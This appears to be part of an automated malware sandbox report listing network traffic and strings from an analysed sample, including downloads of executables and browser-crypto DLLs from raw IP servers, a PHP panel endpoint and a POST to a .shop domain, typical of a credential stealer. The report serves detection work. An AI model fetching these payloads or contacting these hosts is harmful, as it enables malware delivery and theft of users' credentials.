Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66cf818156193_ldjfnsfd.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66cf75d3791d7_vrewqgq.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: condedqpwqm.shop
Source: global traffic DNS traffic detected: DNS query: t.me
Source: global traffic DNS traffic detected: DNS query: stadiatechnologies.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66cf75d3791d7_vrewqgq.exe
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66cf75d3791d7_vrewqgq.exeF
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66cf75d3791d7_vrewqgq.exeT
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66cf75d3791d7_vrewqgq.exeX
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66cf75d3791d7_vrewqgq.exem-data;
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66cf818156193_ldjfnsfd.exe
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66cf818156193_ldjfnsfd.exe-data;
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66cf818156193_ldjfnsfd.exe1kkkk1023589http://147.45.44.104/prog/66cf75d379
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66cf818156193_ldjfnsfd.exeY
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/4
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/8
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/F
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/R
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/Y
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/freebl3.dll
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/freebl3.dllxq
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/mozglue.dll
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/msvcp140.dll
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/msvcp140.dlllq
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/nss3.dll
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/nss3.dll&aQ~)
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/softokn3.dll
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/softokn3.dllPq
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/sql.dll
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/sql.dllna
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/sql.dllrrentVersion
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/vcruntime140.dll
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/~
Source: RegAsm.exe, 0000002E.00000002.2205091531.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2205091531.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2205091531.00000000005AF000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138:80
Source: RegAsm.exe, 0000002E.00000002.2205091531.00000000004B1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138:80IJ
Source: RegAsm.exe, 0000001D.00000002.1926386102.00000000004CE000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138:80JD
Source: RegAsm.exe, 0000002E.00000002.2205091531.00000000004B1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138:80JK
Source: RegAsm.exe, 0000002E.00000002.2205091531.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2205091531.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2205091531.00000000005AF000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138:80e
Source: RegAsm.exe, 0000002E.00000002.2205091531.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138:80exe
Source: RegAsm.exe, 0000002E.00000002.2205091531.00000000004B1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2205091531.00000000004CE000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138:80fa20b20dvTLLjcqfGclHNCCYSAESCTrC.exe
Source: RegAsm.exe, 0000002E.00000002.2205091531.00000000004CE000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138:80ta
Source: RegAsm.exe, 00000003.00000002.1382432761.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dlli
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/nss3.dll(
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/nss3.dlls
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll#
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll-
Source: RegAsm.exe, 00000003.00000002.1382432761.0000000000470000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll_
Source: RegAsm.exe, 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll
Source: RegAsm.exe, 00000003.00000002.1382432761.0000000000470000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1411146244.00000000276DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php
Source: RegAsm.exe, 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php:#
Source: RegAsm.exe, 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpC
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpb
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpnu
Source: RegAsm.exe, 00000003.00000002.1382432761.00000000005AD000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpry=----IDHIIJJJKEGIDGCBAFIJdefaultrelease
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpw
Source: RegAsm.exe, 00000003.00000002.1382432761.00000000005AD000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109KFCFBFIDdata;
Source: userIEHDAFHDHC.exe, 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://64532127VdtSrezylanAPHTGetSystemInfoGetSystemTimeSleepkernel32.dllSymMatchStringInternetSetOp
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, HDAFIIDAKJ.exe.29.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, DHCGHDHIDH.exe.29.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, HDAFIIDAKJ.exe.29.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, DHCGHDHIDH.exe.29.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, HDAFIIDAKJ.exe.29.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, DHCGHDHIDH.exe.29.dr String found in binary or memory: http://ocsp.digicert.com0
